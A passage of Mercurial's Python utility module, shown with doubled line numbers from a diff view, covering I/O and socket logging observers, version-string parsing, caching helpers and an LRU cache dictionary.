857 858 if res is None:
858 859 res = b''
859 860
860 861 if size == -1 and res == b'':
861 862 # Suppress pointless read(-1) calls that return
862 863 # nothing. These happen _a lot_ on Python 3, and there
863 864 # doesn't seem to be a better workaround to have matching
864 865 # Python 2 and 3 behavior. :(
865 866 return
866 867
867 868 if self.logdataapis:
868 869 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
869 870
870 871 self._writedata(res)
871 872
872 873 def readline(self, res, limit=-1):
873 874 if not self.reads:
874 875 return
875 876
876 877 if self.logdataapis:
877 878 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
878 879
879 880 self._writedata(res)
880 881
881 882 def readinto(self, res, dest):
882 883 if not self.reads:
883 884 return
884 885
885 886 if self.logdataapis:
886 887 self.fh.write(
887 888 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
888 889 )
889 890
890 891 data = dest[0:res] if res is not None else b''
891 892
892 893 # _writedata() uses "in" operator and is confused by memoryview because
893 894 # characters are ints on Python 3.
894 895 if isinstance(data, memoryview):
895 896 data = data.tobytes()
896 897
897 898 self._writedata(data)
898 899
899 900 def write(self, res, data):
900 901 if not self.writes:
901 902 return
902 903
903 904 # Python 2 returns None from some write() calls. Python 3 (reasonably)
904 905 # returns the integer bytes written.
905 906 if res is None and data:
906 907 res = len(data)
907 908
908 909 if self.logdataapis:
909 910 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
910 911
911 912 self._writedata(data)
912 913
913 914 def flush(self, res):
914 915 if not self.writes:
915 916 return
916 917
917 918 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
918 919
919 920 # For observedbufferedinputpipe.
920 921 def bufferedread(self, res, size):
921 922 if not self.reads:
922 923 return
923 924
924 925 if self.logdataapis:
925 926 self.fh.write(
926 927 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
927 928 )
928 929
929 930 self._writedata(res)
930 931
931 932 def bufferedreadline(self, res):
932 933 if not self.reads:
933 934 return
934 935
935 936 if self.logdataapis:
936 937 self.fh.write(
937 938 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
938 939 )
939 940
940 941 self._writedata(res)
941 942
942 943
943 944 def makeloggingfileobject(
944 945 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
945 946 ):
946 947 """Turn a file object into a logging file object."""
947 948
948 949 observer = fileobjectobserver(
949 950 logh,
950 951 name,
951 952 reads=reads,
952 953 writes=writes,
953 954 logdata=logdata,
954 955 logdataapis=logdataapis,
955 956 )
956 957 return fileobjectproxy(fh, observer)
957 958
958 959
959 960 class socketobserver(baseproxyobserver):
960 961 """Logs socket activity."""
961 962
962 963 def __init__(
963 964 self,
964 965 fh,
965 966 name,
966 967 reads=True,
967 968 writes=True,
968 969 states=True,
969 970 logdata=False,
970 971 logdataapis=True,
971 972 ):
972 973 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
973 974 self.reads = reads
974 975 self.writes = writes
975 976 self.states = states
976 977
977 978 def makefile(self, res, mode=None, bufsize=None):
978 979 if not self.states:
979 980 return
980 981
981 982 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
982 983
983 984 def recv(self, res, size, flags=0):
984 985 if not self.reads:
985 986 return
986 987
987 988 if self.logdataapis:
988 989 self.fh.write(
989 990 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
990 991 )
991 992 self._writedata(res)
992 993
993 994 def recvfrom(self, res, size, flags=0):
994 995 if not self.reads:
995 996 return
996 997
997 998 if self.logdataapis:
998 999 self.fh.write(
999 1000 b'%s> recvfrom(%d, %d) -> %d'
1000 1001 % (self.name, size, flags, len(res[0]))
1001 1002 )
1002 1003
1003 1004 self._writedata(res[0])
1004 1005
1005 1006 def recvfrom_into(self, res, buf, size, flags=0):
1006 1007 if not self.reads:
1007 1008 return
1008 1009
1009 1010 if self.logdataapis:
1010 1011 self.fh.write(
1011 1012 b'%s> recvfrom_into(%d, %d) -> %d'
1012 1013 % (self.name, size, flags, res[0])
1013 1014 )
1014 1015
1015 1016 self._writedata(buf[0 : res[0]])
1016 1017
1017 1018 def recv_into(self, res, buf, size=0, flags=0):
1018 1019 if not self.reads:
1019 1020 return
1020 1021
1021 1022 if self.logdataapis:
1022 1023 self.fh.write(
1023 1024 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1024 1025 )
1025 1026
1026 1027 self._writedata(buf[0:res])
1027 1028
1028 1029 def send(self, res, data, flags=0):
1029 1030 if not self.writes:
1030 1031 return
1031 1032
1032 1033 self.fh.write(
1033 1034 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1034 1035 )
1035 1036 self._writedata(data)
1036 1037
1037 1038 def sendall(self, res, data, flags=0):
1038 1039 if not self.writes:
1039 1040 return
1040 1041
1041 1042 if self.logdataapis:
1042 1043 # Returns None on success. So don't bother reporting return value.
1043 1044 self.fh.write(
1044 1045 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1045 1046 )
1046 1047
1047 1048 self._writedata(data)
1048 1049
1049 1050 def sendto(self, res, data, flagsoraddress, address=None):
1050 1051 if not self.writes:
1051 1052 return
1052 1053
1053 1054 if address:
1054 1055 flags = flagsoraddress
1055 1056 else:
1056 1057 flags = 0
1057 1058
1058 1059 if self.logdataapis:
1059 1060 self.fh.write(
1060 1061 b'%s> sendto(%d, %d, %r) -> %d'
1061 1062 % (self.name, len(data), flags, address, res)
1062 1063 )
1063 1064
1064 1065 self._writedata(data)
1065 1066
1066 1067 def setblocking(self, res, flag):
1067 1068 if not self.states:
1068 1069 return
1069 1070
1070 1071 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1071 1072
1072 1073 def settimeout(self, res, value):
1073 1074 if not self.states:
1074 1075 return
1075 1076
1076 1077 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1077 1078
1078 1079 def gettimeout(self, res):
1079 1080 if not self.states:
1080 1081 return
1081 1082
1082 1083 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1083 1084
1084 1085 def setsockopt(self, res, level, optname, value):
1085 1086 if not self.states:
1086 1087 return
1087 1088
1088 1089 self.fh.write(
1089 1090 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1090 1091 % (self.name, level, optname, value, res)
1091 1092 )
1092 1093
1093 1094
1094 1095 def makeloggingsocket(
1095 1096 logh,
1096 1097 fh,
1097 1098 name,
1098 1099 reads=True,
1099 1100 writes=True,
1100 1101 states=True,
1101 1102 logdata=False,
1102 1103 logdataapis=True,
1103 1104 ):
1104 1105 """Turn a socket into a logging socket."""
1105 1106
1106 1107 observer = socketobserver(
1107 1108 logh,
1108 1109 name,
1109 1110 reads=reads,
1110 1111 writes=writes,
1111 1112 states=states,
1112 1113 logdata=logdata,
1113 1114 logdataapis=logdataapis,
1114 1115 )
1115 1116 return socketproxy(fh, observer)
1116 1117
1117 1118
1118 1119 def version():
1119 1120 """Return version information if available."""
1120 1121 try:
1121 1122 from . import __version__
1122 1123
1123 1124 return __version__.version
1124 1125 except ImportError:
1125 1126 return b'unknown'
1126 1127
1127 1128
1128 1129 def versiontuple(v=None, n=4):
1129 1130 """Parses a Mercurial version string into an N-tuple.
1130 1131
1131 1132 The version string to be parsed is specified with the ``v`` argument.
1132 1133 If it isn't defined, the current Mercurial version string will be parsed.
1133 1134
1134 1135 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1135 1136 returned values:
1136 1137
1137 1138 >>> v = b'3.6.1+190-df9b73d2d444'
1138 1139 >>> versiontuple(v, 2)
1139 1140 (3, 6)
1140 1141 >>> versiontuple(v, 3)
1141 1142 (3, 6, 1)
1142 1143 >>> versiontuple(v, 4)
1143 1144 (3, 6, 1, '190-df9b73d2d444')
1144 1145
1145 1146 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1146 1147 (3, 6, 1, '190-df9b73d2d444+20151118')
1147 1148
1148 1149 >>> v = b'3.6'
1149 1150 >>> versiontuple(v, 2)
1150 1151 (3, 6)
1151 1152 >>> versiontuple(v, 3)
1152 1153 (3, 6, None)
1153 1154 >>> versiontuple(v, 4)
1154 1155 (3, 6, None, None)
1155 1156
1156 1157 >>> v = b'3.9-rc'
1157 1158 >>> versiontuple(v, 2)
1158 1159 (3, 9)
1159 1160 >>> versiontuple(v, 3)
1160 1161 (3, 9, None)
1161 1162 >>> versiontuple(v, 4)
1162 1163 (3, 9, None, 'rc')
1163 1164
1164 1165 >>> v = b'3.9-rc+2-02a8fea4289b'
1165 1166 >>> versiontuple(v, 2)
1166 1167 (3, 9)
1167 1168 >>> versiontuple(v, 3)
1168 1169 (3, 9, None)
1169 1170 >>> versiontuple(v, 4)
1170 1171 (3, 9, None, 'rc+2-02a8fea4289b')
1171 1172
1172 1173 >>> versiontuple(b'4.6rc0')
1173 1174 (4, 6, None, 'rc0')
1174 1175 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1175 1176 (4, 6, None, 'rc0+12-425d55e54f98')
1176 1177 >>> versiontuple(b'.1.2.3')
1177 1178 (None, None, None, '.1.2.3')
1178 1179 >>> versiontuple(b'12.34..5')
1179 1180 (12, 34, None, '..5')
1180 1181 >>> versiontuple(b'1.2.3.4.5.6')
1181 1182 (1, 2, 3, '.4.5.6')
1182 1183 """
1183 1184 if not v:
1184 1185 v = version()
1185 1186 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1186 1187 if not m:
1187 1188 vparts, extra = b'', v
1188 1189 elif m.group(2):
1189 1190 vparts, extra = m.groups()
1190 1191 else:
1191 1192 vparts, extra = m.group(1), None
1192 1193
1193 1194 assert vparts is not None # help pytype
1194 1195
1195 1196 vints = []
1196 1197 for i in vparts.split(b'.'):
1197 1198 try:
1198 1199 vints.append(int(i))
1199 1200 except ValueError:
1200 1201 break
1201 1202 # (3, 6) -> (3, 6, None)
1202 1203 while len(vints) < 3:
1203 1204 vints.append(None)
1204 1205
1205 1206 if n == 2:
1206 1207 return (vints[0], vints[1])
1207 1208 if n == 3:
1208 1209 return (vints[0], vints[1], vints[2])
1209 1210 if n == 4:
1210 1211 return (vints[0], vints[1], vints[2], extra)
1211 1212
1212 1213
1213 1214 def cachefunc(func):
1214 1215 '''cache the result of function calls'''
1215 1216 # XXX doesn't handle keywords args
1216 1217 if func.__code__.co_argcount == 0:
1217 1218 listcache = []
1218 1219
1219 1220 def f():
1220 1221 if len(listcache) == 0:
1221 1222 listcache.append(func())
1222 1223 return listcache[0]
1223 1224
1224 1225 return f
1225 1226 cache = {}
1226 1227 if func.__code__.co_argcount == 1:
1227 1228 # we gain a small amount of time because
1228 1229 # we don't need to pack/unpack the list
1229 1230 def f(arg):
1230 1231 if arg not in cache:
1231 1232 cache[arg] = func(arg)
1232 1233 return cache[arg]
1233 1234
1234 1235 else:
1235 1236
1236 1237 def f(*args):
1237 1238 if args not in cache:
1238 1239 cache[args] = func(*args)
1239 1240 return cache[args]
1240 1241
1241 1242 return f
1242 1243
1243 1244
1244 1245 class cow(object):
1245 1246 """helper class to make copy-on-write easier
1246 1247
1247 1248 Call preparewrite before doing any writes.
1248 1249 """
1249 1250
1250 1251 def preparewrite(self):
1251 1252 """call this before writes, return self or a copied new object"""
1252 1253 if getattr(self, '_copied', 0):
1253 1254 self._copied -= 1
1254 1255 return self.__class__(self)
1255 1256 return self
1256 1257
1257 1258 def copy(self):
1258 1259 """always do a cheap copy"""
1259 1260 self._copied = getattr(self, '_copied', 0) + 1
1260 1261 return self
1261 1262
1262 1263
1263 1264 class sortdict(collections.OrderedDict):
1264 1265 '''a simple sorted dictionary
1265 1266
1266 1267 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1267 1268 >>> d2 = d1.copy()
1268 1269 >>> d2
1269 1270 sortdict([('a', 0), ('b', 1)])
1270 1271 >>> d2.update([(b'a', 2)])
1271 1272 >>> list(d2.keys()) # should still be in last-set order
1272 1273 ['b', 'a']
1273 1274 >>> d1.insert(1, b'a.5', 0.5)
1274 1275 >>> d1
1275 1276 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1276 1277 '''
1277 1278
1278 1279 def __setitem__(self, key, value):
1279 1280 if key in self:
1280 1281 del self[key]
1281 1282 super(sortdict, self).__setitem__(key, value)
1282 1283
1283 1284 if pycompat.ispypy:
1284 1285 # __setitem__() isn't called as of PyPy 5.8.0
1285 1286 def update(self, src):
1286 1287 if isinstance(src, dict):
1287 1288 src = pycompat.iteritems(src)
1288 1289 for k, v in src:
1289 1290 self[k] = v
1290 1291
1291 1292 def insert(self, position, key, value):
1292 1293 for (i, (k, v)) in enumerate(list(self.items())):
1293 1294 if i == position:
1294 1295 self[key] = value
1295 1296 if i >= position:
1296 1297 del self[k]
1297 1298 self[k] = v
1298 1299
1299 1300
1300 1301 class cowdict(cow, dict):
1301 1302 """copy-on-write dict
1302 1303
1303 1304 Be sure to call d = d.preparewrite() before writing to d.
1304 1305
1305 1306 >>> a = cowdict()
1306 1307 >>> a is a.preparewrite()
1307 1308 True
1308 1309 >>> b = a.copy()
1309 1310 >>> b is a
1310 1311 True
1311 1312 >>> c = b.copy()
1312 1313 >>> c is a
1313 1314 True
1314 1315 >>> a = a.preparewrite()
1315 1316 >>> b is a
1316 1317 False
1317 1318 >>> a is a.preparewrite()
1318 1319 True
1319 1320 >>> c = c.preparewrite()
1320 1321 >>> b is c
1321 1322 False
1322 1323 >>> b is b.preparewrite()
1323 1324 True
1324 1325 """
1325 1326
1326 1327
1327 1328 class cowsortdict(cow, sortdict):
1328 1329 """copy-on-write sortdict
1329 1330
1330 1331 Be sure to call d = d.preparewrite() before writing to d.
1331 1332 """
1332 1333
1333 1334
1334 1335 class transactional(object): # pytype: disable=ignored-metaclass
1335 1336 """Base class for making a transactional type into a context manager."""
1336 1337
1337 1338 __metaclass__ = abc.ABCMeta
1338 1339
1339 1340 @abc.abstractmethod
1340 1341 def close(self):
1341 1342 """Successfully closes the transaction."""
1342 1343
1343 1344 @abc.abstractmethod
1344 1345 def release(self):
1345 1346 """Marks the end of the transaction.
1346 1347
1347 1348 If the transaction has not been closed, it will be aborted.
1348 1349 """
1349 1350
1350 1351 def __enter__(self):
1351 1352 return self
1352 1353
1353 1354 def __exit__(self, exc_type, exc_val, exc_tb):
1354 1355 try:
1355 1356 if exc_type is None:
1356 1357 self.close()
1357 1358 finally:
1358 1359 self.release()
1359 1360
1360 1361
1361 1362 @contextlib.contextmanager
1362 1363 def acceptintervention(tr=None):
1363 1364 """A context manager that closes the transaction on InterventionRequired
1364 1365
1365 1366 If no transaction was provided, this simply runs the body and returns
1366 1367 """
1367 1368 if not tr:
1368 1369 yield
1369 1370 return
1370 1371 try:
1371 1372 yield
1372 1373 tr.close()
1373 1374 except error.InterventionRequired:
1374 1375 tr.close()
1375 1376 raise
1376 1377 finally:
1377 1378 tr.release()
1378 1379
1379 1380
1380 1381 @contextlib.contextmanager
1381 1382 def nullcontextmanager():
1382 1383 yield
1383 1384
1384 1385
1385 1386 class _lrucachenode(object):
1386 1387 """A node in a doubly linked list.
1387 1388
1388 1389 Holds a reference to nodes on either side as well as a key-value
1389 1390 pair for the dictionary entry.
1390 1391 """
1391 1392
1392 1393 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1393 1394
1394 1395 def __init__(self):
1395 1396 self.next = None
1396 1397 self.prev = None
1397 1398
1398 1399 self.key = _notset
1399 1400 self.value = None
1400 1401 self.cost = 0
1401 1402
1402 1403 def markempty(self):
1403 1404 """Mark the node as emptied."""
1404 1405 self.key = _notset
1405 1406 self.value = None
1406 1407 self.cost = 0
1407 1408
1408 1409
1409 1410 class lrucachedict(object):
1410 1411 """Dict that caches most recent accesses and sets.
1411 1412
1412 1413 The dict consists of an actual backing dict - indexed by original
1413 1414 key - and a doubly linked circular list defining the order of entries in
1414 1415 the cache.
1415 1416
1416 1417 The head node is the newest entry in the cache. If the cache is full,
1417 1418 we recycle head.prev and make it the new head. Cache accesses result in
1418 1419 the node being moved to before the existing head and being marked as the
1419 1420 new head node.
1420 1421
1421 1422 Items in the cache can be inserted with an optional "cost" value. This is
1422 1423 simply an integer that is specified by the caller. The cache can be queried
1423 1424 for the total cost of all items presently in the cache.
1424 1425
1425 1426 The cache can also define a maximum cost. If a cache insertion would
1426 1427 cause the total cost of the cache to go beyond the maximum cost limit,
1427 1428 nodes will be evicted to make room for the new code. This can be used
1428 1429 to e.g. set a max memory limit and associate an estimated bytes size
1429 1430 cost to each item in the cache. By default, no maximum cost is enforced.
1430 1431 """
1431 1432
1432 1433 def __init__(self, max, maxcost=0):
1433 1434 self._cache = {}
1434 1435
1435 1436 self._head = head = _lrucachenode()
1436 1437 head.prev = head
1437 1438 head.next = head
1438 1439 self._size = 1
1439 1440 self.capacity = max
1440 1441 self.totalcost = 0
1441 1442 self.maxcost = maxcost
1442 1443
1443 1444 def __len__(self):
1444 1445 return len(self._cache)
1445 1446
1446 1447 def __contains__(self, k):
1447 1448 return k in self._cache
1448 1449
1449 1450 def __iter__(self):
1450 1451 # We don't have to iterate in cache order, but why not.
1451 1452 n = self._head
1452 1453 for i in range(len(self._cache)):
1453 1454 yield n.key
1454 1455 n = n.next
1455 1456
1456 1457 def __getitem__(self, k):
1457 1458 node = self._cache[k]
1458 1459 self._movetohead(node)
1459 1460 return node.value
1460 1461
1461 1462 def insert(self, k, v, cost=0):
1462 1463 """Insert a new item in the cache with optional cost value."""
1463 1464 node = self._cache.get(k)
1464 1465 # Replace existing value and mark as newest.
1465 1466 if node is not None:
1466 1467 self.totalcost -= node.cost
1467 1468 node.value = v
1468 1469 node.cost = cost
1469 1470 self.totalcost += cost
1470 1471 self._movetohead(node)
1471 1472
1472 1473 if self.maxcost:
1473 1474 self._enforcecostlimit()
1474 1475
1475 1476 return
1476 1477
1477 1478 if self._size < self.capacity:
1478 1479 node = self._addcapacity()
1479 1480 else:
1480 1481 # Grab the last/oldest item.
1481 1482 node = self._head.prev
1482 1483
1483 1484 # At capacity. Kill the old entry.
1484 1485 if node.key is not _notset:
1485 1486 self.totalcost -= node.cost
1486 1487 del self._cache[node.key]
1487 1488
1488 1489 node.key = k
1489 1490 node.value = v
1490 1491 node.cost = cost
1491 1492 self.totalcost += cost
1492 1493 self._cache[k] = node
1493 1494 # And mark it as newest entry. No need to adjust order since it
1494 1495 # is already self._head.prev.
1495 1496 self._head = node
1496 1497
1497 1498 if self.maxcost:
1498 1499 self._enforcecostlimit()
1499 1500
1500 1501 def __setitem__(self, k, v):
1501 1502 self.insert(k, v)
1502 1503
1503 1504 def __delitem__(self, k):
1504 1505 self.pop(k)
1505 1506
1506 1507 def pop(self, k, default=_notset):
1507 1508 try:
1508 1509 node = self._cache.pop(k)
1509 1510 except KeyError:
1510 1511 if default is _notset:
1511 1512 raise
1512 1513 return default
1513 1514
1514 1515 assert node is not None # help pytype
1515 1516 value = node.value
1516 1517 self.totalcost -= node.cost
1517 1518 node.markempty()
1518 1519
1519 1520 # Temporarily mark as newest item before re-adjusting head to make
1520 1521 # this node the oldest item.
1521 1522 self._movetohead(node)
1522 1523 self._head = node.next
1523 1524
1524 1525 return value
1525 1526
1526 1527 # Additional dict methods.
1527 1528
1528 1529 def get(self, k, default=None):
1529 1530 try:
1530 1531 return self.__getitem__(k)
1531 1532 except KeyError:
1532 1533 return default
1533 1534
1534 1535 def peek(self, k, default=_notset):
1535 1536 """Get the specified item without moving it to the head
1536 1537
1537 1538 Unlike get(), this doesn't mutate the internal state. But be aware
1538 1539 that it doesn't mean peek() is thread safe.
1539 1540 """
1540 1541 try:
1541 1542 node = self._cache[k]
1542 1543 return node.value
1543 1544 except KeyError:
1544 1545 if default is _notset:
1545 1546 raise
1546 1547 return default
1547 1548
1548 1549 def clear(self):
1549 1550 n = self._head
1550 1551 while n.key is not _notset:
1551 1552 self.totalcost -= n.cost
1552 1553 n.markempty()
1553 1554 n = n.next
1554 1555
1555 1556 self._cache.clear()
1556 1557
1557 1558 def copy(self, capacity=None, maxcost=0):
1558 1559 """Create a new cache as a copy of the current one.
1559 1560
1560 1561 By default, the new cache has the same capacity as the existing one.
1561 1562 But, the cache capacity can be changed as part of performing the
1562 1563 copy.
1563 1564
1564 1565 Items in the copy have an insertion/access order matching this
1565 1566 instance.
1566 1567 """
1567 1568
1568 1569 capacity = capacity or self.capacity
1569 1570 maxcost = maxcost or self.maxcost
1570 1571 result = lrucachedict(capacity, maxcost=maxcost)
1571 1572
1572 1573 # We copy entries by iterating in oldest-to-newest order so the copy
1573 1574 # has the correct ordering.
1574 1575
1575 1576 # Find the first non-empty entry.
1576 1577 n = self._head.prev
1577 1578 while n.key is _notset and n is not self._head:
1578 1579 n = n.prev
1579 1580
1580 1581 # We could potentially skip the first N items when decreasing capacity.
1581 1582 # But let's keep it simple unless it is a performance problem.
1582 1583 for i in range(len(self._cache)):
1583 1584 result.insert(n.key, n.value, cost=n.cost)
1584 1585 n = n.prev
1585 1586
1586 1587 return result
1587 1588
1588 1589 def popoldest(self):
1589 1590 """Remove the oldest item from the cache.
1590 1591
1591 1592 Returns the (key, value) describing the removed cache entry.
1592 1593 """
1593 1594 if not self._cache:
1594 1595 return
1595 1596
1596 1597 # Walk the linked list backwards starting at tail node until we hit
1597 1598 # a non-empty node.
1598 1599 n = self._head.prev
1599 1600 while n.key is _notset:
1600 1601 n = n.prev
1601 1602
1602 1603 assert n is not None # help pytype
1603 1604
1604 1605 key, value = n.key, n.value
1605 1606
1606 1607 # And remove it from the cache and mark it as empty.
1607 1608 del self._cache[n.key]
1608 1609 self.totalcost -= n.cost
1609 1610 n.markempty()
1610 1611
1611 1612 return key, value
1612 1613
1613 1614 def _movetohead(self, node):
1614 1615 """Mark a node as the newest, making it the new head.
1615 1616
1616 1617 When a node is accessed, it becomes the freshest entry in the LRU
1617 1618 list, which is denoted by self._head.
1618 1619
1619 1620 Visually, let's make ``N`` the new head node (* denotes head):
1620 1621
1621 1622 previous/oldest <-> head <-> next/next newest
1622 1623
1623 1624 ----<->--- A* ---<->-----
1624 1625 | |
1625 1626 E <-> D <-> N <-> C <-> B
1626 1627
1627 1628 To:
1628 1629
1629 1630 ----<->--- N* ---<->-----
1630 1631 | |
1631 1632 E <-> D <-> C <-> B <-> A
1632 1633
1633 1634 This requires the following moves:
1634 1635
1635 1636 C.next = D (node.prev.next = node.next)
1636 1637 D.prev = C (node.next.prev = node.prev)
1637 1638 E.next = N (head.prev.next = node)
1638 1639 N.prev = E (node.prev = head.prev)
1639 1640 N.next = A (node.next = head)
1640 1641 A.prev = N (head.prev = node)
1641 1642 """
1642 1643 head = self._head
1643 1644 # C.next = D
1644 1645 node.prev.next = node.next
1645 1646 # D.prev = C
1646 1647 node.next.prev = node.prev
1647 1648 # N.prev = E
1648 1649 node.prev = head.prev
1649 1650 # N.next = A
1650 1651 # It is tempting to do just "head" here, however if node is
1651 1652 # adjacent to head, this will do bad things.
1652 1653 node.next = head.prev.next
1653 1654 # E.next = N
1654 1655 node.next.prev = node
1655 1656 # A.prev = N
1656 1657 node.prev.next = node
1657 1658
1658 1659 self._head = node
1659 1660
1660 1661 def _addcapacity(self):
1661 1662 """Add a node to the circular linked list.
1662 1663
1663 1664 The new node is inserted before the head node.
1664 1665 """
1665 1666 head = self._head
1666 1667 node = _lrucachenode()
1667 1668 head.prev.next = node
1668 1669 node.prev = head.prev
1669 1670 node.next = head
1670 1671 head.prev = node
1671 1672 self._size += 1
1672 1673 return node
1673 1674
1674 1675 def _enforcecostlimit(self):
1675 1676 # This should run after an insertion. It should only be called if total
1676 1677 # cost limits are being enforced.
1677 1678 # The most recently inserted node is never evicted.
1678 1679 if len(self) <= 1 or self.totalcost <= self.maxcost:
1679 1680 return
1680 1681
1681 1682 # This is logically equivalent to calling popoldest() until we
1682 1683 # free up enough cost. We don't do that since popoldest() needs
1683 1684 # to walk the linked list and doing this in a loop would be
1684 1685 # quadratic. So we find the first non-empty node and then
1685 1686 # walk nodes until we free up enough capacity.
1686 1687 #
1687 1688 # If we only removed the minimum number of nodes to free enough
1688 1689 # cost at insert time, chances are high that the next insert would
1689 1690 # also require pruning. This would effectively constitute quadratic
1690 1691 # behavior for insert-heavy workloads. To mitigate this, we set a
1691 1692 # target cost that is a percentage of the max cost. This will tend
1692 1693 # to free more nodes when the high water mark is reached, which
1693 1694 # lowers the chances of needing to prune on the subsequent insert.
1694 1695 targetcost = int(self.maxcost * 0.75)
1695 1696
1696 1697 n = self._head.prev
1697 1698 while n.key is _notset:
1698 1699 n = n.prev
1699 1700
1700 1701 while len(self) > 1 and self.totalcost > targetcost:
1701 1702 del self._cache[n.key]
1702 1703 self.totalcost -= n.cost
1703 1704 n.markempty()
1704 1705 n = n.prev
1705 1706
1706 1707
1707 1708 def lrucachefunc(func):
1708 1709 '''cache most recent results of function calls'''
1709 1710 cache = {}
1710 1711 order = collections.deque()
1711 1712 if func.__code__.co_argcount == 1:
1712 1713
1713 1714 def f(arg):
1714 1715 if arg not in cache:
1715 1716 if len(cache) > 20:
1716 1717 del cache[order.popleft()]
1717 1718 cache[arg] = func(arg)
1718 1719 else:
1719 1720 order.remove(arg)
1720 1721 order.append(arg)
1721 1722 return cache[arg]
1722 1723
1723 1724 else:
1724 1725
1725 1726 def f(*args):
1726 1727 if args not in cache:
1727 1728 if len(cache) > 20:
1728 1729 del cache[order.popleft()]
1729 1730 cache[args] = func(*args)
1730 1731 else:
1731 1732 order.remove(args)
1732 1733 order.append(args)
1733 1734 return cache[args]
1734 1735
1735 1736 return f
1736 1737
1737 1738
1738 1739 class propertycache(object):
1739 1740 def __init__(self, func):
1740 1741 self.func = func
1741 1742 self.name = func.__name__
1742 1743
1743 1744 def __get__(self, obj, type=None):
1744 1745 result = self.func(obj)
1745 1746 self.cachevalue(obj, result)
1746 1747 return result
1747 1748
1748 1749 def cachevalue(self, obj, value):
1749 1750 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1750 1751 obj.__dict__[self.name] = value
1751 1752
1752 1753
1753 1754 def clearcachedproperty(obj, prop):
1754 1755 '''clear a cached property value, if one has been set'''
1755 1756 prop = pycompat.sysstr(prop)
1756 1757 if prop in obj.__dict__:
1757 1758 del obj.__dict__[prop]
1758 1759
1759 1760
1760 1761 def increasingchunks(source, min=1024, max=65536):
1761 1762 '''return no less than min bytes per chunk while data remains,
1762 1763 doubling min after each chunk until it reaches max'''
1763 1764
1764 1765 def log2(x):
1765 1766 if not x:
1766 1767 return 0
1767 1768 i = 0
1768 1769 while x:
1769 1770 x >>= 1
1770 1771 i += 1
1771 1772 return i - 1
1772 1773
1773 1774 buf = []
1774 1775 blen = 0
1775 1776 for chunk in source:
1776 1777 buf.append(chunk)
1777 1778 blen += len(chunk)
1778 1779 if blen >= min:
1779 1780 if min < max:
1780 1781 min = min << 1
1781 1782 nmin = 1 << log2(blen)
1782 1783 if nmin > min:
1783 1784 min = nmin
1784 1785 if min > max:
1785 1786 min = max
1786 1787 yield b''.join(buf)
1787 1788 blen = 0
1788 1789 buf = []
1789 1790 if buf:
1790 1791 yield b''.join(buf)
1791 1792
1792 1793
1793 1794 def always(fn):
1794 1795 return True
1795 1796
1796 1797
1797 1798 def never(fn):
1798 1799 return False
1799 1800
1800 1801
1801 1802 def nogc(func):
1802 1803 """disable garbage collector
1803 1804
1804 1805 Python's garbage collector triggers a GC each time a certain number of
1805 1806 container objects (the number being defined by gc.get_threshold()) are
1806 1807 allocated even when marked not to be tracked by the collector. Tracking has
1807 1808 no effect on when GCs are triggered, only on what objects the GC looks
1808 1809 into. As a workaround, disable GC while building complex (huge)
1809 1810 containers.
1810 1811
1811 1812 This garbage collector issue have been fixed in 2.7. But it still affect
1812 1813 CPython's performance.
1813 1814 """
1814 1815
1815 1816 def wrapper(*args, **kwargs):
1816 1817 gcenabled = gc.isenabled()
1817 1818 gc.disable()
1818 1819 try:
1819 1820 return func(*args, **kwargs)
1820 1821 finally:
1821 1822 if gcenabled:
1822 1823 gc.enable()
1823 1824
1824 1825 return wrapper
1825 1826
1826 1827
1827 1828 if pycompat.ispypy:
1828 1829 # PyPy runs slower with gc disabled
1829 1830 nogc = lambda x: x
1830 1831
1831 1832
1832 1833 def pathto(root, n1, n2):
1833 1834 '''return the relative path from one place to another.
1834 1835 root should use os.sep to separate directories
1835 1836 n1 should use os.sep to separate directories
1836 1837 n2 should use "/" to separate directories
1837 1838 returns an os.sep-separated path.
1838 1839
1839 1840 If n1 is a relative path, it's assumed it's
1840 1841 relative to root.
1841 1842 n2 should always be relative to root.
1842 1843 '''
1843 1844 if not n1:
1844 1845 return localpath(n2)
1845 1846 if os.path.isabs(n1):
1846 1847 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1847 1848 return os.path.join(root, localpath(n2))
1848 1849 n2 = b'/'.join((pconvert(root), n2))
1849 1850 a, b = splitpath(n1), n2.split(b'/')
1850 1851 a.reverse()
1851 1852 b.reverse()
1852 1853 while a and b and a[-1] == b[-1]:
1853 1854 a.pop()
1854 1855 b.pop()
1855 1856 b.reverse()
1856 1857 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1857 1858
1858 1859
1859 1860 def checksignature(func, depth=1):
1860 1861 '''wrap a function with code to check for calling errors'''
1861 1862
1862 1863 def check(*args, **kwargs):
1863 1864 try:
1864 1865 return func(*args, **kwargs)
1865 1866 except TypeError:
1866 1867 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1867 1868 raise error.SignatureError
1868 1869 raise
1869 1870
1870 1871 return check
1871 1872
1872 1873
1873 1874 # a whilelist of known filesystems where hardlink works reliably
1874 1875 _hardlinkfswhitelist = {
1875 1876 b'apfs',
1876 1877 b'btrfs',
1877 1878 b'ext2',
